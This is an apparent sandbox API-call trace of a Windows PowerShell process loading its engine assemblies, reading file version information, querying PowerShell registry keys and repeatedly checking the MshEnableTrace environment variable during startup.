	[0362.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x427f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0362.763] CoTaskMemFree (pv=0x427f10) 
	[0362.765] CoTaskMemAlloc (cb=0x104) returned 0x427f10
	[0362.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x427f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0362.765] CoTaskMemFree (pv=0x427f10) 
	[0362.767] CoTaskMemAlloc (cb=0x104) returned 0x427f10
	[0362.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x427f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0362.767] CoTaskMemFree (pv=0x427f10) 
	[0362.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0362.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0362.777] SetErrorMode (uMode=0x1) returned 0x1
	[0362.778] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d940 | out: lpFileInformation=0x14d940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0362.778] SetErrorMode (uMode=0x1) returned 0x1
	[0362.778] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14dbb0 | out: lpdwHandle=0x14dbb0) returned 0x94c
	[0362.779] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ae1420 | out: lpData=0x2ae1420) returned 1
	[0362.780] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14db28, puLen=0x14db20 | out: lplpBuffer=0x14db28*=0x2ae14bc, puLen=0x14db20) returned 1
	[0362.780] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae1598, puLen=0x14da90) returned 1
	[0362.780] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0362.780] CoTaskMemAlloc (cb=0x2e) returned 0x420120
	[0362.780] lstrcpyW (in: lpString1=0x420120, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0362.780] CoTaskMemFree (pv=0x420120) 
	[0362.780] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae15ec, puLen=0x14da90) returned 1
	[0362.780] lstrlenW (lpString="System.Management.Automation") returned 28
	[0362.780] CoTaskMemAlloc (cb=0x3c) returned 0x41b780
	[0362.780] lstrcpyW (in: lpString1=0x41b780, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0362.780] CoTaskMemFree (pv=0x41b780) 
	[0362.780] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae1648, puLen=0x14da90) returned 1
	[0362.780] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0362.780] CoTaskMemAlloc (cb=0x20) returned 0x422970
	[0362.780] lstrcpyW (in: lpString1=0x422970, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0362.780] CoTaskMemFree (pv=0x422970) 
	[0362.780] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae1688, puLen=0x14da90) returned 1
	[0362.780] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0362.780] CoTaskMemAlloc (cb=0x44) returned 0x41b780
	[0362.780] lstrcpyW (in: lpString1=0x41b780, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0362.781] CoTaskMemFree (pv=0x41b780) 
	[0362.781] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae16f0, puLen=0x14da90) returned 1
	[0362.781] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0362.781] CoTaskMemAlloc (cb=0x76) returned 0x3c31a0
	[0362.781] lstrcpyW (in: lpString1=0x3c31a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0362.781] CoTaskMemFree (pv=0x3c31a0) 
	[0362.781] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae178c, puLen=0x14da90) returned 1
	[0362.781] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0362.781] CoTaskMemAlloc (cb=0x44) returned 0x41b780
	[0362.781] lstrcpyW (in: lpString1=0x41b780, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0362.781] CoTaskMemFree (pv=0x41b780) 
	[0362.781] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae17f0, puLen=0x14da90) returned 1
	[0362.781] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0362.781] CoTaskMemAlloc (cb=0x58) returned 0x376a90
	[0362.781] lstrcpyW (in: lpString1=0x376a90, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0362.781] CoTaskMemFree (pv=0x376a90) 
	[0362.781] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae186c, puLen=0x14da90) returned 1
	[0362.781] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0362.781] CoTaskMemAlloc (cb=0x20) returned 0x422970
	[0362.781] lstrcpyW (in: lpString1=0x422970, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0362.781] CoTaskMemFree (pv=0x422970) 
	[0362.781] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2ae1514, puLen=0x14da90) returned 1
	[0362.781] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0362.781] CoTaskMemAlloc (cb=0x66) returned 0x420ad0
	[0362.781] lstrcpyW (in: lpString1=0x420ad0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0362.782] CoTaskMemFree (pv=0x420ad0) 
	[0362.782] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x0, puLen=0x14da90) returned 0
	[0362.782] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x0, puLen=0x14da90) returned 0
	[0362.782] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x0, puLen=0x14da90) returned 0
	[0362.782] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14da68, puLen=0x14da60 | out: lplpBuffer=0x14da68*=0x2ae14bc, puLen=0x14da60) returned 1
	[0362.782] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0362.782] VerLanguageNameW (in: wLang=0x0, szLang=0x3c94a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0362.782] CoTaskMemFree (pv=0x3c94a0) 
	[0362.782] VerQueryValueW (in: pBlock=0x2ae1420, lpSubBlock="\\", lplpBuffer=0x14dab8, puLen=0x14dab0 | out: lplpBuffer=0x14dab8*=0x2ae1448, puLen=0x14dab0) returned 1
	[0362.790] CoTaskMemAlloc (cb=0x104) returned 0x427f10
	[0362.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x427f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0362.790] CoTaskMemFree (pv=0x427f10) 
	[0362.795] CoTaskMemAlloc (cb=0x104) returned 0x427f10
	[0362.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x427f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0362.795] CoTaskMemFree (pv=0x427f10) 
	[0362.847] lstrlenW (lpString="䅁") returned 1
	[0362.857] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d988 | out: phkResult=0x14d988*=0x300) returned 0x0
	[0362.859] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d978 | out: phkResult=0x14d978*=0x304) returned 0x0
	[0362.884] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14da08 | out: phkResult=0x14da08*=0x308) returned 0x0
	[0362.889] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d94c, lpData=0x0, lpcbData=0x14d948*=0x0 | out: lpType=0x14d94c*=0x1, lpData=0x0, lpcbData=0x14d948*=0x56) returned 0x0
	[0362.890] CoTaskMemAlloc (cb=0x5a) returned 0x420a60
	[0362.890] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d91c, lpData=0x420a60, lpcbData=0x14d918*=0x56 | out: lpType=0x14d91c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d918*=0x56) returned 0x0
	[0362.890] CoTaskMemFree (pv=0x420a60) 
	[0362.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0362.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0363.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0363.048] CoTaskMemAlloc (cb=0x104) returned 0x427f10
	[0363.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x427f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0363.048] CoTaskMemFree (pv=0x427f10) 
	[0364.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0364.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0364.225] CoTaskMemAlloc (cb=0x104) returned 0x4306e0
	[0364.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4306e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.225] CoTaskMemFree (pv=0x4306e0) 
	[0364.226] CoTaskMemAlloc (cb=0x104) returned 0x4306e0
	[0364.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4306e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.226] CoTaskMemFree (pv=0x4306e0) 
	[0364.306] CoTaskMemAlloc (cb=0x104) returned 0x4306e0
	[0364.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4306e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.306] CoTaskMemFree (pv=0x4306e0) 
	[0364.307] CoTaskMemAlloc (cb=0x104) returned 0x4306e0
	[0364.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4306e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.307] CoTaskMemFree (pv=0x4306e0) 
	[0364.308] CoTaskMemAlloc (cb=0x104) returned 0x4306e0
	[0364.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4306e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.308] CoTaskMemFree (pv=0x4306e0) 
	[0364.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0364.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0364.803] CoTaskMemAlloc (cb=0x104) returned 0x42b060
	[0364.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42b060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.803] CoTaskMemFree (pv=0x42b060) 
	[0364.806] CoTaskMemAlloc (cb=0x104) returned 0x42b060
	[0364.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42b060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.806] CoTaskMemFree (pv=0x42b060) 
	[0365.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0365.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0366.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0366.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0366.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0366.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0367.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0367.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0368.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0368.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0368.525] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0368.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0368.526] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0368.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0368.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0368.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0368.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0369.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0369.093] SetErrorMode (uMode=0x1) returned 0x1
	[0369.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14d8e0 | out: lpFileInformation=0x14d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0369.093] SetErrorMode (uMode=0x1) returned 0x1
	[0369.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0369.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0369.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0369.938] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0369.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0369.938] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0369.939] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0369.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0369.939] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0369.939] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0369.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0369.939] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0369.941] CoCreateGuid (in: pguid=0x14dca8 | out: pguid=0x14dca8*(Data1=0x243e7527, Data2=0xa565, Data3=0x4c91, Data4=([0]=0x91, [1]=0x5d, [2]=0xa2, [3]=0x4b, [4]=0xe8, [5]=0x40, [6]=0xd7, [7]=0xbe))) returned 0x0
	[0370.171] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0370.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0370.171] CoTaskMemFree (pv=0x1b6ff8b0) 
